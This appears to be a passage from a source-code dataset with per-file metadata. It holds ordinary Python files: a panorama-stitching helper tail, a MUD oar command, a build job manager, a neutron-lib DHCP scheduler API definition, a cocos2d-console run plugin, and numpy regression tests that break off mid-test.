# - it is done along with converting the image to JPEG
__set_progress(95, 'Saving result as JPEG')
__pano_to_jpeg(output_url + '.tif', output_url + '.jpg')
__reset_progress()
def check_panotools_available():
"""
Check whether all required Panorama tools are installed and available
in the system and throw an exception if they are not.
List of the required tools is taken from the PARAMS dict (its keys
are taken, to be exact).
"""
missing = []
for command in PARAMS.keys():
if shutil.which(command) is None:
missing += [command]
if missing:
raise FileNotFoundError('Panorama tools are missing from the OS. '
'Tools that are not available: {}'
.format(', '.join(sorted(missing))))
def __set_progress(progress, operation):
sdc = StatisticDataCollector()
sdc.on_progress_changed(progress, 'Stitching panorama', operation + '...')
def __reset_progress():
StatisticDataCollector().on_progress_changed(-1, '', '')
| mit | 3,860,691,852,866,815,000 | 33.458333 | 80 | 0.638855 | false |
vlegoff/tsunami | src/secondaires/navigation/commandes/rames/tenir.py | 1 | 2899 | # -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# raise of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this raise of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant le paramètre 'tenir' de la commande 'rames'."""
from primaires.interpreteur.masque.parametre import Parametre
class PrmTenir(Parametre):
"""Commande 'rames tenir'.
"""
def __init__(self):
"""Constructeur du paramètre"""
Parametre.__init__(self, "tenir", "hold")
self.aide_courte = "saisit les rames"
self.aide_longue = \
"Cette commande permet de tenir les rames. Vous ne pouvez " \
"naturellement pas ramer sans tenir les rames auparavant."
def interpreter(self, personnage, dic_masques):
"""Interprétation du paramètre"""
salle = personnage.salle
if not hasattr(salle, "navire") or salle.navire is None or \
salle.navire.etendue is None:
personnage << "|err|Vous n'êtes pas sur un navire.|ff|"
return
navire = salle.navire
rames = salle.rames
if not rames:
personnage << "|err|Il n'y a pas de rames ici.|ff|"
return
personnage.agir("ramer")
if rames.tenu is personnage:
personnage << "|err|Vous tenez déjà ces rames.|ff|"
elif rames.tenu is not None:
personnage << "|err|Quelqu'un tient déjà ces rames.|ff|"
else:
rames.tenir(personnage)
| bsd-3-clause | 6,961,421,554,475,576,000 | 40.884058 | 79 | 0.694118 | false |
cnwzhjs/onemake | lib/job_manager.py | 1 | 3124 | import thread
import threading
import os.path
ALL_JOBS={}
JOBS_COUNT={
'pending': 0,
'working': 0,
'error': 0,
'done': 0,
'source': 0
}
JOBS_LOCK=thread.allocate_lock()
JOBS_COND=threading.Condition()
class Job(object):
def __init__(self, job_type, dest, depends, args=None):
self.job_type = job_type
self.dest = dest
self.depends = depends
self.args = args
self.__status = "pending"
@property
def status(self):
return self.__status
@status.setter
def status(self, v):
if v == self.__status:
return
JOBS_COUNT[self.__status] -= 1
JOBS_COUNT[v] += 1
self.__status = v
@property
def ready_to_start(self):
if self.__status != 'pending':
return False
for depend in self.depends:
if not depend:
continue
if depend.status != 'done':
return False
return True
@property
def should_compile(self):
if self.job_type == 'source_library':
return False
elif self.depends is None or not len(self.depends):
return not os.path.exists(self.dest)
else:
if not os.path.exists(self.dest):
return True
ctime = os.path.getctime(self.dest)
for depend_job in self.depends:
if depend_job is None:
continue
if os.path.exists(depend_job.dest) and os.path.getctime(depend_job.dest) > ctime:
return True
return False
def add_job(job_type, dest, depends, args=None):
if dest in ALL_JOBS:
return
job = Job(job_type, dest, depends, args)
JOBS_COUNT['pending'] += 1
ALL_JOBS[dest] = job
return job
def add_source_job(filename):
job = add_job('source', filename, [])
if job is not None:
job.status = 'done'
JOBS_COUNT['source'] += 1
return job
def add_or_lookup_source_job(filename):
return ALL_JOBS[filename] if filename in ALL_JOBS else add_source_job(filename)
def fetch_and_mark_start():
output = "wait", None
JOBS_LOCK.acquire()
if JOBS_COUNT['pending'] == 0 or JOBS_COUNT['error'] != 0:
output = "done", None
else:
for job in ALL_JOBS.values():
if job.ready_to_start:
job.status = 'working'
output = "work", job
break
JOBS_LOCK.release()
if output[0] == "wait":
JOBS_COND.acquire()
JOBS_COND.wait()
JOBS_COND.release()
return fetch_and_mark_start()
else:
return output
def __update_status(job, new_status):
JOBS_LOCK.acquire()
job.status = new_status
JOBS_LOCK.release()
JOBS_COND.acquire()
JOBS_COND.notify_all()
JOBS_COND.release()
def mark_error(job):
__update_status(job, 'error')
def mark_done(job):
__update_status(job, 'done')
| bsd-2-clause | 8,658,479,901,913,993,000 | 22.030769 | 97 | 0.529449 | false |
openstack/neutron-lib | neutron_lib/api/definitions/dhcpagentscheduler.py | 1 | 2226 | # Copyright (c) 2013 OpenStack Foundation.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.api.definitions import agent as agent_apidef
from neutron_lib.api.definitions import network as net_apidef
from neutron_lib import constants
DHCP_NET = 'dhcp-network'
DHCP_NETS = DHCP_NET + 's'
DHCP_AGENT = 'dhcp-agent'
DHCP_AGENTS = DHCP_AGENT + 's'
ALIAS = constants.DHCP_AGENT_SCHEDULER_EXT_ALIAS
IS_SHIM_EXTENSION = False
IS_STANDARD_ATTR_EXTENSION = False
NAME = 'DHCP Agent Scheduler'
API_PREFIX = ''
DESCRIPTION = 'Schedule networks among dhcp agents'
UPDATED_TIMESTAMP = '2013-02-07T10:00:00-00:00'
RESOURCE_ATTRIBUTE_MAP = {}
SUB_RESOURCE_ATTRIBUTE_MAP = {
DHCP_NETS: {
'parent': {
'collection_name': agent_apidef.COLLECTION_NAME,
'member_name': agent_apidef.RESOURCE_NAME
},
'parameters': {
'network_id': {
'allow_post': True, 'allow_put': False,
'default': constants.ATTR_NOT_SPECIFIED,
'enforce_policy': True,
'is_visible': True,
'validate': {'type:uuid': None}
}
}
},
DHCP_AGENTS: {
'parent': {
'collection_name': net_apidef.COLLECTION_NAME,
'member_name': net_apidef.RESOURCE_NAME
},
# NOTE(boden): the reference implementation only allows the index
# operation for the agent exposed under the network resource
'parameters': agent_apidef.RESOURCE_ATTRIBUTE_MAP[
agent_apidef.COLLECTION_NAME]
}
}
ACTION_MAP = {}
REQUIRED_EXTENSIONS = [agent_apidef.ALIAS]
OPTIONAL_EXTENSIONS = []
ACTION_STATUS = {}
| apache-2.0 | 8,052,478,717,131,474,000 | 33.78125 | 78 | 0.650943 | false |
imeteora/cocos2d-x-3.x-Qt | tools/cocos2d-console/plugins/project_run/project_run.py | 1 | 4469 | #!/usr/bin/python
# ----------------------------------------------------------------------------
# cocos "install" plugin
#
# Authr: Luis Parravicini
#
# License: MIT
# ----------------------------------------------------------------------------
'''
"run" plugin for cocos command line tool
'''
__docformat__ = 'restructuredtext'
import sys
import os
import cocos
import BaseHTTPServer
import webbrowser
import threading
def open_webbrowser(url):
threading.Event().wait(1)
webbrowser.open_new(url)
class CCPluginRun(cocos.CCPlugin):
"""
Compiles a project and runs it on the target
"""
@staticmethod
def depends_on():
return ('deploy',)
@staticmethod
def plugin_name():
return "run"
@staticmethod
def brief_description():
return "Compiles & deploy project and then runs it on the target"
def _add_custom_options(self, parser):
parser.add_argument("-m", "--mode", dest="mode", default='debug',
help="Set the run mode, should be debug|release, default is debug.")
group = parser.add_argument_group("web project arguments")
group.add_argument("port", metavar="SERVER_PORT", nargs='?', default='8000',
help="Set the port of the local web server, defualt is 8000")
def _check_custom_options(self, args):
self._port = args.port
self._mode = args.mode
def run_ios_sim(self, dependencies):
if not self._platforms.is_ios_active():
return
deploy_dep = dependencies['deploy']
iossim_exe_path = os.path.join(os.path.dirname(__file__), 'bin', 'ios-sim')
launch_sim = "%s launch %s &" % (iossim_exe_path, deploy_dep._iosapp_path)
self._run_cmd(launch_sim)
def run_mac(self, dependencies):
if not self._platforms.is_mac_active():
return
deploy_dep = dependencies['deploy']
launch_macapp = 'open %s &' % deploy_dep._macapp_path
self._run_cmd(launch_macapp)
def run_android_device(self, dependencies):
if not self._platforms.is_android_active():
return
sdk_root = cocos.check_environment_variable('ANDROID_SDK_ROOT')
adb_path = os.path.join(sdk_root, 'platform-tools', 'adb')
deploy_dep = dependencies['deploy']
startapp = "%s shell am start -n \"%s/%s\"" % (adb_path, deploy_dep.package, deploy_dep.activity)
self._run_cmd(startapp)
pass
def run_web(self, dependencies):
if not self._platforms.is_web_active():
return
from SimpleHTTPServer import SimpleHTTPRequestHandler
HandlerClass = SimpleHTTPRequestHandler
ServerClass = BaseHTTPServer.HTTPServer
Protocol = "HTTP/1.0"
port = int(self._port)
server_address = ('127.0.0.1', port)
HandlerClass.protocol_version = Protocol
httpd = ServerClass(server_address, HandlerClass)
sa = httpd.socket.getsockname()
from threading import Thread
deploy_dep = dependencies['deploy']
sub_url = deploy_dep.sub_url
url = 'http://127.0.0.1:%s%s' % (port, sub_url)
thread = Thread(target = open_webbrowser, args = (url,))
thread.start()
run_root = deploy_dep.run_root
with cocos.pushd(run_root):
cocos.Logging.info("Serving HTTP on %s, port %s ..." % (sa[0], sa[1]))
httpd.serve_forever()
def run_win32(self, dependencies):
if not self._platforms.is_win32_active():
return
deploy_dep = dependencies['deploy']
run_root = deploy_dep.run_root
exe = deploy_dep.project_name
with cocos.pushd(run_root):
self._run_cmd(os.path.join(run_root, exe))
def run_linux(self, dependencies):
if not self._platforms.is_linux_active():
return
deploy_dep = dependencies['deploy']
run_root = deploy_dep.run_root
exe = deploy_dep.project_name
with cocos.pushd(run_root):
self._run_cmd(os.path.join(run_root, exe))
def run(self, argv, dependencies):
self.parse_args(argv)
cocos.Logging.info("starting application")
self.run_android_device(dependencies)
self.run_ios_sim(dependencies)
self.run_mac(dependencies)
self.run_web(dependencies)
self.run_win32(dependencies)
self.run_linux(dependencies)
| gpl-2.0 | 2,125,554,945,817,964,500 | 29.609589 | 105 | 0.585142 | false |
embray/numpy | numpy/core/tests/test_regression.py | 1 | 70764 | from __future__ import division, absolute_import, print_function
import copy
import pickle
import sys
import platform
import gc
import copy
import warnings
import tempfile
from os import path
from io import BytesIO
import numpy as np
from numpy.testing import (
run_module_suite, TestCase, assert_, assert_equal,
assert_almost_equal, assert_array_equal, assert_array_almost_equal,
assert_raises, assert_warns, dec
)
from numpy.testing.utils import _assert_valid_refcount
from numpy.compat import asbytes, asunicode, asbytes_nested, long, sixu
rlevel = 1
class TestRegression(TestCase):
def test_invalid_round(self,level=rlevel):
"""Ticket #3"""
v = 4.7599999999999998
assert_array_equal(np.array([v]), np.array(v))
def test_mem_empty(self,level=rlevel):
"""Ticket #7"""
np.empty((1,), dtype=[('x', np.int64)])
def test_pickle_transposed(self,level=rlevel):
"""Ticket #16"""
a = np.transpose(np.array([[2, 9], [7, 0], [3, 8]]))
f = BytesIO()
pickle.dump(a, f)
f.seek(0)
b = pickle.load(f)
f.close()
assert_array_equal(a, b)
def test_typeNA(self,level=rlevel):
"""Ticket #31"""
assert_equal(np.typeNA[np.int64], 'Int64')
assert_equal(np.typeNA[np.uint64], 'UInt64')
def test_dtype_names(self,level=rlevel):
"""Ticket #35"""
dt = np.dtype([(('name', 'label'), np.int32, 3)])
def test_reduce(self,level=rlevel):
"""Ticket #40"""
assert_almost_equal(np.add.reduce([1., .5], dtype=None), 1.5)
def test_zeros_order(self,level=rlevel):
"""Ticket #43"""
np.zeros([3], int, 'C')
np.zeros([3], order='C')
np.zeros([3], int, order='C')
def test_asarray_with_order(self,level=rlevel):
"""Check that nothing is done when order='F' and array C/F-contiguous"""
a = np.ones(2)
assert_(a is np.asarray(a, order='F'))
def test_ravel_with_order(self,level=rlevel):
"""Check that ravel works when order='F' and array C/F-contiguous"""
a = np.ones(2)
assert_(not a.ravel('F').flags.owndata)
def test_sort_bigendian(self,level=rlevel):
"""Ticket #47"""
a = np.linspace(0, 10, 11)
c = a.astype(np.dtype('<f8'))
c.sort()
assert_array_almost_equal(c, a)
def test_negative_nd_indexing(self,level=rlevel):
"""Ticket #49"""
c = np.arange(125).reshape((5, 5, 5))
origidx = np.array([-1, 0, 1])
idx = np.array(origidx)
c[idx]
assert_array_equal(idx, origidx)
def test_char_dump(self,level=rlevel):
"""Ticket #50"""
f = BytesIO()
ca = np.char.array(np.arange(1000, 1010), itemsize=4)
ca.dump(f)
f.seek(0)
ca = np.load(f)
f.close()
def test_noncontiguous_fill(self,level=rlevel):
"""Ticket #58."""
a = np.zeros((5, 3))
b = a[:, :2,]
def rs():
b.shape = (10,)
self.assertRaises(AttributeError, rs)
def test_bool(self,level=rlevel):
"""Ticket #60"""
x = np.bool_(1)
def test_indexing1(self,level=rlevel):
"""Ticket #64"""
descr = [('x', [('y', [('z', 'c16', (2,)),]),]),]
buffer = ((([6j, 4j],),),)
h = np.array(buffer, dtype=descr)
h['x']['y']['z']
def test_indexing2(self,level=rlevel):
"""Ticket #65"""
descr = [('x', 'i4', (2,))]
buffer = ([3, 2],)
h = np.array(buffer, dtype=descr)
h['x']
def test_round(self,level=rlevel):
"""Ticket #67"""
x = np.array([1+2j])
assert_almost_equal(x**(-1), [1/(1+2j)])
def test_scalar_compare(self,level=rlevel):
"""Ticket #72"""
a = np.array(['test', 'auto'])
assert_array_equal(a == 'auto', np.array([False, True]))
self.assertTrue(a[1] == 'auto')
self.assertTrue(a[0] != 'auto')
b = np.linspace(0, 10, 11)
self.assertTrue(b != 'auto')
self.assertTrue(b[0] != 'auto')
def test_unicode_swapping(self,level=rlevel):
"""Ticket #79"""
ulen = 1
ucs_value = sixu('\U0010FFFF')
ua = np.array([[[ucs_value*ulen]*2]*3]*4, dtype='U%s' % ulen)
ua2 = ua.newbyteorder()
def test_object_array_fill(self,level=rlevel):
"""Ticket #86"""
x = np.zeros(1, 'O')
x.fill([])
def test_mem_dtype_align(self,level=rlevel):
"""Ticket #93"""
self.assertRaises(TypeError, np.dtype,
{'names':['a'],'formats':['foo']}, align=1)
@dec.knownfailureif((sys.version_info[0] >= 3) or
(sys.platform == "win32" and platform.architecture()[0] == "64bit"),
"numpy.intp('0xff', 16) not supported on Py3, "
"as it does not inherit from Python int")
def test_intp(self,level=rlevel):
"""Ticket #99"""
i_width = np.int_(0).nbytes*2 - 1
np.intp('0x' + 'f'*i_width, 16)
self.assertRaises(OverflowError, np.intp, '0x' + 'f'*(i_width+1), 16)
self.assertRaises(ValueError, np.intp, '0x1', 32)
assert_equal(255, np.intp('0xFF', 16))
assert_equal(1024, np.intp(1024))
def test_endian_bool_indexing(self,level=rlevel):
"""Ticket #105"""
a = np.arange(10., dtype='>f8')
b = np.arange(10., dtype='<f8')
xa = np.where((a>2) & (a<6))
xb = np.where((b>2) & (b<6))
ya = ((a>2) & (a<6))
yb = ((b>2) & (b<6))
assert_array_almost_equal(xa, ya.nonzero())
assert_array_almost_equal(xb, yb.nonzero())
assert_(np.all(a[ya] > 0.5))
assert_(np.all(b[yb] > 0.5))
def test_endian_where(self,level=rlevel):
"""GitHuB issue #369"""
net = np.zeros(3, dtype='>f4')
net[1] = 0.00458849
net[2] = 0.605202
max_net = net.max()
test = np.where(net <= 0., max_net, net)
correct = np.array([ 0.60520202, 0.00458849, 0.60520202])
assert_array_almost_equal(test, correct)
def test_endian_recarray(self,level=rlevel):
"""Ticket #2185"""
dt = np.dtype([
('head', '>u4'),
('data', '>u4', 2),
])
buf = np.recarray(1, dtype=dt)
buf[0]['head'] = 1
buf[0]['data'][:] = [1, 1]
h = buf[0]['head']
d = buf[0]['data'][0]
buf[0]['head'] = h
buf[0]['data'][0] = d
assert_(buf[0]['head'] == 1)
def test_mem_dot(self,level=rlevel):
"""Ticket #106"""
x = np.random.randn(0, 1)
y = np.random.randn(10, 1)
# Dummy array to detect bad memory access:
_z = np.ones(10)
_dummy = np.empty((0, 10))
z = np.lib.stride_tricks.as_strided(_z, _dummy.shape, _dummy.strides)
np.dot(x, np.transpose(y), out=z)
assert_equal(_z, np.ones(10))
# Do the same for the built-in dot:
np.core.multiarray.dot(x, np.transpose(y), out=z)
assert_equal(_z, np.ones(10))
def test_arange_endian(self,level=rlevel):
"""Ticket #111"""
ref = np.arange(10)
x = np.arange(10, dtype='<f8')
assert_array_equal(ref, x)
x = np.arange(10, dtype='>f8')
assert_array_equal(ref, x)
# Longfloat support is not consistent enough across
# platforms for this test to be meaningful.
# def test_longfloat_repr(self,level=rlevel):
# """Ticket #112"""
# if np.longfloat(0).itemsize > 8:
# a = np.exp(np.array([1000],dtype=np.longfloat))
# assert_(str(a)[1:9] == str(a[0])[:8])
def test_argmax(self,level=rlevel):
"""Ticket #119"""
a = np.random.normal(0, 1, (4, 5, 6, 7, 8))
for i in range(a.ndim):
aargmax = a.argmax(i)
def test_mem_divmod(self,level=rlevel):
"""Ticket #126"""
for i in range(10):
divmod(np.array([i])[0], 10)
def test_hstack_invalid_dims(self,level=rlevel):
"""Ticket #128"""
x = np.arange(9).reshape((3, 3))
y = np.array([0, 0, 0])
self.assertRaises(ValueError, np.hstack, (x, y))
def test_squeeze_type(self,level=rlevel):
"""Ticket #133"""
a = np.array([3])
b = np.array(3)
assert_(type(a.squeeze()) is np.ndarray)
assert_(type(b.squeeze()) is np.ndarray)
def test_add_identity(self,level=rlevel):
"""Ticket #143"""
assert_equal(0, np.add.identity)
def test_numpy_float_python_long_addition(self):
# Check that numpy float and python longs can be added correctly.
a = np.float_(23.) + 2**135
assert_equal(a, 23. + 2**135)
def test_binary_repr_0(self,level=rlevel):
"""Ticket #151"""
assert_equal('0', np.binary_repr(0))
def test_rec_iterate(self,level=rlevel):
"""Ticket #160"""
descr = np.dtype([('i', int), ('f', float), ('s', '|S3')])
x = np.rec.array([(1, 1.1, '1.0'),
(2, 2.2, '2.0')], dtype=descr)
x[0].tolist()
[i for i in x[0]]
def test_unicode_string_comparison(self,level=rlevel):
"""Ticket #190"""
a = np.array('hello', np.unicode_)
b = np.array('world')
a == b
def test_tobytes_FORTRANORDER_discontiguous(self,level=rlevel):
"""Fix in r2836"""
# Create discontiguous Fortran-ordered array
x = np.array(np.random.rand(3, 3), order='F')[:, :2]
assert_array_almost_equal(x.ravel(), np.fromstring(x.tobytes()))
def test_flat_assignment(self,level=rlevel):
"""Correct behaviour of ticket #194"""
x = np.empty((3, 1))
x.flat = np.arange(3)
assert_array_almost_equal(x, [[0], [1], [2]])
x.flat = np.arange(3, dtype=float)
assert_array_almost_equal(x, [[0], [1], [2]])
def test_broadcast_flat_assignment(self,level=rlevel):
"""Ticket #194"""
x = np.empty((3, 1))
def bfa(): x[:] = np.arange(3)
def bfb(): x[:] = np.arange(3, dtype=float)
self.assertRaises(ValueError, bfa)
self.assertRaises(ValueError, bfb)
def test_nonarray_assignment(self):
# See also Issue gh-2870, test for nonarray assignment
# and equivalent unsafe casted array assignment
a = np.arange(10)
b = np.ones(10, dtype=bool)
r = np.arange(10)
def assign(a, b, c):
a[b] = c
assert_raises(ValueError, assign, a, b, np.nan)
a[b] = np.array(np.nan) # but not this.
assert_raises(ValueError, assign, a, r, np.nan)
a[r] = np.array(np.nan)
def test_unpickle_dtype_with_object(self,level=rlevel):
"""Implemented in r2840"""
dt = np.dtype([('x', int), ('y', np.object_), ('z', 'O')])
f = BytesIO()
pickle.dump(dt, f)
f.seek(0)
dt_ = pickle.load(f)
f.close()
assert_equal(dt, dt_)
def test_mem_array_creation_invalid_specification(self,level=rlevel):
"""Ticket #196"""
dt = np.dtype([('x', int), ('y', np.object_)])
# Wrong way
self.assertRaises(ValueError, np.array, [1, 'object'], dt)
# Correct way
np.array([(1, 'object')], dt)
def test_recarray_single_element(self,level=rlevel):
"""Ticket #202"""
a = np.array([1, 2, 3], dtype=np.int32)
b = a.copy()
r = np.rec.array(a, shape=1, formats=['3i4'], names=['d'])
assert_array_equal(a, b)
assert_equal(a, r[0][0])
def test_zero_sized_array_indexing(self,level=rlevel):
"""Ticket #205"""
tmp = np.array([])
def index_tmp(): tmp[np.array(10)]
self.assertRaises(IndexError, index_tmp)
def test_chararray_rstrip(self,level=rlevel):
"""Ticket #222"""
x = np.chararray((1,), 5)
x[0] = asbytes('a ')
x = x.rstrip()
assert_equal(x[0], asbytes('a'))
def test_object_array_shape(self,level=rlevel):
"""Ticket #239"""
assert_equal(np.array([[1, 2], 3, 4], dtype=object).shape, (3,))
assert_equal(np.array([[1, 2], [3, 4]], dtype=object).shape, (2, 2))
assert_equal(np.array([(1, 2), (3, 4)], dtype=object).shape, (2, 2))
assert_equal(np.array([], dtype=object).shape, (0,))
assert_equal(np.array([[], [], []], dtype=object).shape, (3, 0))
assert_equal(np.array([[3, 4], [5, 6], None], dtype=object).shape, (3,))
def test_mem_around(self,level=rlevel):
"""Ticket #243"""
x = np.zeros((1,))
y = [0]
decimal = 6
np.around(abs(x-y), decimal) <= 10.0**(-decimal)
def test_character_array_strip(self,level=rlevel):
"""Ticket #246"""
x = np.char.array(("x", "x ", "x "))
for c in x: assert_equal(c, "x")
def test_lexsort(self,level=rlevel):
"""Lexsort memory error"""
v = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
assert_equal(np.lexsort(v), 0)
def test_lexsort_invalid_sequence(self):
# Issue gh-4123
class BuggySequence(object):
def __len__(self):
return 4
def __getitem__(self, key):
raise KeyError
assert_raises(KeyError, np.lexsort, BuggySequence())
def test_pickle_dtype(self,level=rlevel):
"""Ticket #251"""
pickle.dumps(np.float)
def test_swap_real(self, level=rlevel):
"""Ticket #265"""
assert_equal(np.arange(4, dtype='>c8').imag.max(), 0.0)
assert_equal(np.arange(4, dtype='<c8').imag.max(), 0.0)
assert_equal(np.arange(4, dtype='>c8').real.max(), 3.0)
assert_equal(np.arange(4, dtype='<c8').real.max(), 3.0)
def test_object_array_from_list(self, level=rlevel):
"""Ticket #270"""
a = np.array([1, 'A', None])
def test_multiple_assign(self, level=rlevel):
"""Ticket #273"""
a = np.zeros((3, 1), int)
a[[1, 2]] = 1
def test_empty_array_type(self, level=rlevel):
assert_equal(np.array([]).dtype, np.zeros(0).dtype)
def test_void_copyswap(self, level=rlevel):
dt = np.dtype([('one', '<i4'), ('two', '<i4')])
x = np.array((1, 2), dtype=dt)
x = x.byteswap()
assert_(x['one'] > 1 and x['two'] > 2)
def test_method_args(self, level=rlevel):
# Make sure methods and functions have same default axis
# keyword and arguments
funcs1= ['argmax', 'argmin', 'sum', ('product', 'prod'),
('sometrue', 'any'),
('alltrue', 'all'), 'cumsum', ('cumproduct', 'cumprod'),
'ptp', 'cumprod', 'prod', 'std', 'var', 'mean',
'round', 'min', 'max', 'argsort', 'sort']
funcs2 = ['compress', 'take', 'repeat']
for func in funcs1:
arr = np.random.rand(8, 7)
arr2 = arr.copy()
if isinstance(func, tuple):
func_meth = func[1]
func = func[0]
else:
func_meth = func
res1 = getattr(arr, func_meth)()
res2 = getattr(np, func)(arr2)
if res1 is None:
res1 = arr
if res1.dtype.kind in 'uib':
assert_((res1 == res2).all(), func)
else:
assert_(abs(res1-res2).max() < 1e-8, func)
for func in funcs2:
arr1 = np.random.rand(8, 7)
arr2 = np.random.rand(8, 7)
res1 = None
if func == 'compress':
arr1 = arr1.ravel()
res1 = getattr(arr2, func)(arr1)
else:
arr2 = (15*arr2).astype(int).ravel()
if res1 is None:
res1 = getattr(arr1, func)(arr2)
res2 = getattr(np, func)(arr1, arr2)
assert_(abs(res1-res2).max() < 1e-8, func)
def test_mem_lexsort_strings(self, level=rlevel):
"""Ticket #298"""
lst = ['abc', 'cde', 'fgh']
np.lexsort((lst,))
def test_fancy_index(self, level=rlevel):
"""Ticket #302"""
x = np.array([1, 2])[np.array([0])]
assert_equal(x.shape, (1,))
def test_recarray_copy(self, level=rlevel):
"""Ticket #312"""
dt = [('x', np.int16), ('y', np.float64)]
ra = np.array([(1, 2.3)], dtype=dt)
rb = np.rec.array(ra, dtype=dt)
rb['x'] = 2.
assert_(ra['x'] != rb['x'])
def test_rec_fromarray(self, level=rlevel):
"""Ticket #322"""
x1 = np.array([[1, 2], [3, 4], [5, 6]])
x2 = np.array(['a', 'dd', 'xyz'])
x3 = np.array([1.1, 2, 3])
np.rec.fromarrays([x1, x2, x3], formats="(2,)i4,a3,f8")
def test_object_array_assign(self, level=rlevel):
x = np.empty((2, 2), object)
x.flat[2] = (1, 2, 3)
assert_equal(x.flat[2], (1, 2, 3))
def test_ndmin_float64(self, level=rlevel):
"""Ticket #324"""
x = np.array([1, 2, 3], dtype=np.float64)
assert_equal(np.array(x, dtype=np.float32, ndmin=2).ndim, 2)
assert_equal(np.array(x, dtype=np.float64, ndmin=2).ndim, 2)
def test_ndmin_order(self, level=rlevel):
"""Issue #465 and related checks"""
assert_(np.array([1, 2], order='C', ndmin=3).flags.c_contiguous)
assert_(np.array([1, 2], order='F', ndmin=3).flags.f_contiguous)
assert_(np.array(np.ones((2, 2), order='F'), ndmin=3).flags.f_contiguous)
assert_(np.array(np.ones((2, 2), order='C'), ndmin=3).flags.c_contiguous)
def test_mem_axis_minimization(self, level=rlevel):
"""Ticket #327"""
data = np.arange(5)
data = np.add.outer(data, data)
def test_mem_float_imag(self, level=rlevel):
"""Ticket #330"""
np.float64(1.0).imag
def test_dtype_tuple(self, level=rlevel):
"""Ticket #334"""
assert_(np.dtype('i4') == np.dtype(('i4', ())))
def test_dtype_posttuple(self, level=rlevel):
"""Ticket #335"""
np.dtype([('col1', '()i4')])
def test_numeric_carray_compare(self, level=rlevel):
"""Ticket #341"""
assert_equal(np.array(['X'], 'c'), asbytes('X'))
def test_string_array_size(self, level=rlevel):
"""Ticket #342"""
self.assertRaises(ValueError,
np.array, [['X'], ['X', 'X', 'X']], '|S1')
def test_dtype_repr(self, level=rlevel):
"""Ticket #344"""
dt1=np.dtype(('uint32', 2))
dt2=np.dtype(('uint32', (2,)))
assert_equal(dt1.__repr__(), dt2.__repr__())
def test_reshape_order(self, level=rlevel):
"""Make sure reshape order works."""
a = np.arange(6).reshape(2, 3, order='F')
assert_equal(a, [[0, 2, 4], [1, 3, 5]])
a = np.array([[1, 2], [3, 4], [5, 6], [7, 8]])
b = a[:, 1]
assert_equal(b.reshape(2, 2, order='F'), [[2, 6], [4, 8]])
def test_reshape_zero_strides(self, level=rlevel):
"""Issue #380, test reshaping of zero strided arrays"""
a = np.ones(1)
a = np.lib.stride_tricks.as_strided(a, shape=(5,), strides=(0,))
assert_(a.reshape(5, 1).strides[0] == 0)
def test_reshape_zero_size(self, level=rlevel):
"""Github Issue #2700, setting shape failed for 0-sized arrays"""
a = np.ones((0, 2))
a.shape = (-1, 2)
# Cannot test if NPY_RELAXED_STRIDES_CHECKING changes the strides.
# With NPY_RELAXED_STRIDES_CHECKING the test becomes superfluous.
@dec.skipif(np.ones(1).strides[0] == np.iinfo(np.intp).max)
def test_reshape_trailing_ones_strides(self):
# Github issue gh-2949, bad strides for trailing ones of new shape
a = np.zeros(12, dtype=np.int32)[::2] # not contiguous
strides_c = (16, 8, 8, 8)
strides_f = (8, 24, 48, 48)
assert_equal(a.reshape(3, 2, 1, 1).strides, strides_c)
assert_equal(a.reshape(3, 2, 1, 1, order='F').strides, strides_f)
assert_equal(np.array(0, dtype=np.int32).reshape(1, 1).strides, (4, 4))
def test_repeat_discont(self, level=rlevel):
"""Ticket #352"""
a = np.arange(12).reshape(4, 3)[:, 2]
assert_equal(a.repeat(3), [2, 2, 2, 5, 5, 5, 8, 8, 8, 11, 11, 11])
def test_array_index(self, level=rlevel):
"""Make sure optimization is not called in this case."""
a = np.array([1, 2, 3])
a2 = np.array([[1, 2, 3]])
assert_equal(a[np.where(a==3)], a2[np.where(a2==3)])
def test_object_argmax(self, level=rlevel):
a = np.array([1, 2, 3], dtype=object)
assert_(a.argmax() == 2)
def test_recarray_fields(self, level=rlevel):
"""Ticket #372"""
dt0 = np.dtype([('f0', 'i4'), ('f1', 'i4')])
dt1 = np.dtype([('f0', 'i8'), ('f1', 'i8')])
for a in [np.array([(1, 2), (3, 4)], "i4,i4"),
np.rec.array([(1, 2), (3, 4)], "i4,i4"),
np.rec.array([(1, 2), (3, 4)]),
np.rec.fromarrays([(1, 2), (3, 4)], "i4,i4"),
np.rec.fromarrays([(1, 2), (3, 4)])]:
assert_(a.dtype in [dt0, dt1])
def test_random_shuffle(self, level=rlevel):
"""Ticket #374"""
a = np.arange(5).reshape((5, 1))
b = a.copy()
np.random.shuffle(b)
